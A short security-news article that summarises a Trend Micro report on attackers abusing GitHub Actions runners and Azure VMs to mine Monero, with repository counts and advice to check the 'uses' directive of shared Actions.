Cybercriminals are abusing GitHub Actions (GHAs) and Azure virtual machines (VMs) for cloud-based cryptocurrency mining. According to a Trend Micro’s recent report, a threat actors can leverage the runners or servers provided by GitHub to run an organization's pipelines and automation by maliciously downloading and installing crypto miners.
Using GitHub Actions CI/CD platform, developers can automate their software build, test, and deployment pipeline. The platform allows to create workflows for building and testing every pull request to a code repository, or deploy merged pull requests to production.
Trend Micro identified at least 1,000 repositories and over 550 code samples that abuse GHAs for cryptocurrency mining. Similar variants of a YAML script containing commands to mine Monero were found in 11 repositories. All of them were connected to the same wallet, which means that there is the same actor behind the operation.
“For as long as the malicious actors only use their own accounts and repositories, end users should have no cause for worry. This is a problem GitHub is cognizant of and is trying to address and mitigate as much as possible. However, it is hard to eliminate the problem entirely. Problems arise when these GHAs are shared on GitHub Marketplace or used as a dependency for other Actions,” reads the report.
Anyone can create and share GHA on GitHub Marketplace. That’s why it is recommended to exercise caution and discernment when choosing a shared GHA from Marketplace. The researchers advise looking for the “uses” directive on GHA YAML files.